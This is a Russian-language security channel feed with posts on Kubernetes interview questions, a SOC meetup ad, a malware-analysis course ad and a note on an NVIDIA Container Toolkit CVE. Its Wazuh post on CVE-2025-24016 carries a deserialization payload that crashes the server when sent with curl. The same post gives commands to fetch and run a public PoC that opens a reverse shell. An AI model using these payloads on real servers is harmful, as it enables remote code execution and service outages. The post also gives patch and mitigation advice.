Найти в Дзене
Топ вопросов и ответов на собеседовании по Kubernetes #k8s #собес #собеседование #kubernetes Не то чтобы мне интересно были собеседования, но т.к. самому приходиться изучать кубер, то вопросами с собеса понимаешь что есть минимальная граница знаний, чтобы можно было сказать "я знаю, что такое кубер" Статья базовая, но подойдёт начинающим DevOps, AppSec, DevSecOps, CloudSec спецам или тем, кто хочет мигрировать в ранее перечисленные должности. Вопросы на собесе: ➡️Что такое Kubernetes? ➡️Перечислите основные компоненты кластера Kubernetes ➡️Что такое Pod в Kubernetes? ➡️В чем разница между Deployment и StatefulSet? ➡️Что такое сервис (service) и какие типы сервисов существуют в Kubernetes? ➡️Что такое Ingress? ➡️Что такое Ingress-контроллер? ➡️Как организовать хранение чувствительных данных (секретов), включая логины, пароли, токены, ключи? ➡️Что такое метки и селекторы и для чего они используются? ➡️Что такое пробы (probes) в Kubernetes, какие типы проб существуют и для чего используются? ➡️Что такое Pod Disruption Budget и для чего используется? ➡️Как контролировать использование ресурсов для контейнеров? ➡️Как предоставить доступ до запущенного приложения из внешней сети? ➡️Что такое CNI-интерфейс? ➡️Что такое CRI? ➡️Что такое Persistent Volume (PV)? ➡️Что такое Persistent Volume Claim (PVC)? ➡️Как назначать права доступа в кластере Kubernetes? А ответы на эти вопросы вы прочитаете в статье на Хабре)) ➡️ Узнать ответы P.S. если ответить самому себе честно, на сколько вопросов из 18 вы смогли ответить? 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
10 месяцев назад
В условиях роста количества и усложнения кибератак отсутствие автоматизированных подходов к реагированию на инциденты ИБ увеличивает риски для бизнеса. Только 36% компаний выявляют нарушителей в большинстве случаев, а почти четверть уже сталкивались с критичными кибератаками. К2 Кибербезопасность и Kaspersky провели более 100 глубинных интервью в Enterprise-сегменте и выяснили, как бизнес подходит к построению процессов мониторинга и реагирования. 20 февраля в 11:00 мск в формате живого диалога обсудим результаты исследования и поделимся экспертным прогнозом о развитии рынка SOC. В программе встречи: ✅ Как SOC ускоряет обнаружение и устранение инцидентов ✅ В чем преимущества MSSP-модели по сравнению с другими моделями ✅ О чем надо помнить при построении собственного SOC ✅ На что нужно обращать внимание при выборе провайдера услуг. Кстати, все зарегистрированные участники в числе первых получат полный текст исследования до митапа. Зарегистрироваться на онлайн-митап можно по ссылке 😉 Реклама. АО "К2 ИНТЕГРАЦИЯ". ИНН 7701829110
10 месяцев назад
Wazuh RCE via Unsafe Deserialization CVE-2025-24016 #CVE@poxek #wazuh #deserialization #RCE В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров DistributedAPI в формате JSON и последующей десериализации через функцию as_wazuh_object (расположенную в framework/wazuh/core/cluster/common.py). Если злоумышленник внедрит небезопасный словарь в запрос или ответ DAPI, это может привести к генерации необработанного исключения (__unhandled_exc__) и, как следствие, выполнению произвольного Python-кода, что позволяет дистанционно выполнить код на сервере. ➡️Уязвимые версии От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1) PoC 1. Эксплойт на python3 git clone https://github.com/0xjessie21/CVE-2025-24016.git cd CVE-2025-24016/ python3 -m venv venv; source venv/bin/activate pip install -r requirements.txt Скрипт позволяет сразу сделать reverse shell python3 CVE-2025-24016.py -u <url> -i <IP> -p <PORT> PoC 2. Шаблон для nuclei wget https://raw.githubusercontent.com/huseyinstif/CVE-2025-24016-Nuclei-Template/refs/heads/main/CVE-2025-24016.yaml Там есть пометка в комментах, что если есть авторизация, то раскомментировать строку PoC 3. Ручная эксплуатация curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" --data '{"unhandled_exc":{"class": "exit", "args": []}}' https://<worker-server>:55000/security/user/authenticate/run_as Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера. 📌Пояснение к уязвимости от разработчиков Wazuh ТЫК ➡️Рекомендации ▪️Обновление ПО: Обязательно обновите Wazuh до версии 4.9.1 или выше, где уязвимость устранена. ▪️Ограничение доступа: Проверьте и ограничьте доступ к API. 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
10 месяцев назад
Ломаем ваши видеокарты: распаковка эксплойта для CVE-2024-0132 под NVIDIA Container Toolkit #nvidia #CVE@poxek #container В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit. Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости. P.s. респект команде Luntry ➡️Подробности 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
10 месяцев назад
Крутая возможность для: • специалистов по реагированию на компьютерные инциденты • сотрудников команд SOC, TI, DFIR ⚡️Авторский курс по анализу вредоносного ПО На курсе ты освоишь инструменты и техники, необходимые для анализа вредоносных программ под Windows. Ты научишься: 📎 проводить предварительный анализ образцов через открытые сервисы и источники, а также в песочницах; 📎 работать с дизассемблированным кодом в рамках статического анализа; 📎 использовать отладчик для динамического анализа исполняемых файлов; 📎 обходить техники, затрудняющие анализ вредоносного кода; 📎 писать YARA-правила.               Авторы курса: 1. Дмитрий Купин — Руководитель группы исследования вредоносного кода (BI. ZONE) 2. Семён Рогачев — Руководитель отдела реагирования на инциденты в компании Бастион ✅ Учим тому, что точно пригодится в работе ✅ Комфортная нагрузка без отрыва от работы ✅ Вечный доступ в чат с экспертами и коллегами  Старт: 1 марта → Смотри программу и записывайся
10 месяцев назад
Если нравится — подпишитесь
Так вы не пропустите новые публикации этого канала